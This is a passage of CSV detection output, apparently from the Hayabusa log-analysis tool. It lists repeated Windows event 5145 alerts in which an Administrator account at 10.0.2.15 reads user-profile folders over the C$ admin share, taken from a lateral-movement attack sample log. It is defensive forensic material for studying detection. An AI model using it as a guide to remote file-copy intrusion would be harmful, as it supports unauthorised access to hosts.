Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved 
Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents 
: IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
